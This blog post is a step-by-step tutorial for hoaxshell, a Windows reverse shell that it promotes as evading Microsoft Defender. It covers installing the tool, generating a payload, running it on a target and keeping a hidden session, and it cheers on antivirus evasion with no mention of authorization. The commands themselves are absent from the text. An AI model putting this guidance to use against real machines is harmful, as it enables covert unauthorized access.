Greetings, everyone! In this post, I’ll be providing a concise guide on hoaxshell – a newly developed Windows reverse shell undetectable to Windows Defender created by t3l3machus. Let’s get started!
Setup
To install the necessary dependencies for any project without leaving my system in disarray, I recommend setting up a Python virtual environment first. For this, you will need Git and Python3 installed. To use the venv module on your machine, execute the following command: Sudo apt install python3-venv.
Let’s create a virtual environment, clone the hoaxshell repository, and install the mandatory Python packages with this command.
Verify that the hoaxshell repository works properly by executing the following command and accessing the help menu
Is it possible to craft reverse shell payloads with Hoaxshell?
Utilizing hoaxshell on our device, we can create some windows reverse shells that will be impossible to detect. To produce a conventional reverse shell payload and start an HTTP listener with hoaxshell (standard port 8080), execute the command below
This is what your terminal should display
On the Windows target box, executing a particular PowerShell command is necessary to acquire a reverse shell. To have an understanding of what the said command is executing, type in ‘raw payload’ into the hoaxshell prompt and press enter.
Within a PowerShell terminal window on the target Windows machine, copy and run the PowerShell payload.
Assuming no errors were thrown, you should have gotten a call-back to your reverse shell on your attacking machine. Hoaxshell confirms the payload was valid and you now have an uninterrupted connection – and most importantly, Microsoft Defender is oblivious to the malicious activity for the time being (which is awesome)!
With Hoaxshell, you can perform many awesome functions like encrypted transit, reconnect disconnected sessions, and send traffic via Ngrok or LocalTunnel. Explore these impressive capabilities on your own! There you have it: an invisible reverse shell compatible with the all-new Windows 11 OS. Time to hack!
1 comment